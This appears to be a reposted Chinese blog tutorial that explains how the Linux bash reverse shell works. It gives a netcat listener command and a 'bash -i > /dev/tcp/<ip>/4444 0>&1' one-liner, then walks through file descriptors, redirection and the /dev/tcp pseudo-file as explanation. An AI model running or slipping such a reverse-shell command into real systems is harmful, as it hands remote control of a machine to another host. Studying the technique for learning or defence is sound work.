IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> Linux反弹 shell 命令解析 -> 正文阅读

[系统运维]Linux反弹 shell 命令解析

Linux反弹 shell

# kali
nc -lvp 4444
# centos
bash -i > /dev/tcp/192.168.139.149/4444 0>&1

请添加图片描述

原理:

就是将 bash 程序的标准输入输出通过 tcp 连接重定向到远端主机上

先了解一下 Linux 的输入输出流,0、1、2为文件描述符代码,被系统占用,后面打开的文件只能用4及之后的数字表示

   0		表示标准输入(stdin)			 也就是程序的输入
   1		表示标准输出(stdout)		     程序运行正确返回的信息,默认输出到屏幕
   2		标准错误输出(stderr)           程序运行返回的报错信息,默认也是输出到屏幕

命令的各个部分说明

  • bash -i表示开启一个交互式的 bash 命令行程序

  • >输出重定向符号,其实完整的是bash -i 1 >(因为如果>前面没有数字,则默认为1)表示将前面程序的标准输出重定向到后面的文件/程序;同理 < 就是输入重定向,表示前面程序的标准输入

  • /dev/tcp/192.168.139.149/4444,这个表示打开一个 tcp socket 连接,只在 bash 中可用。虽然用文件的形式表示,但是实际并不存在这个文件,可以理解为 bash 下的虚拟文件(个人理解)

    bash -i > /dev/tcp/192.168.139.149/4444 # 在执行这个命令,建立连接之后,在bash -i进程文件下可以看到描述符 1 指向了一个socket
    ps -ef | grep bash  # 找到bash -i命令的进程号
    ls -l /proc/{pid}/
    

    请添加图片描述

  • >&作用类似变量的引用复制,2 >& 1表将标准错误输出指向标准输出所指向的地方。>&<&等价,没有方向性的区别,方向性取决于前面文件描述符本身的方向

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-08-30 12:34:54  更:2021-08-30 12:36:39 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 10:51:03-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计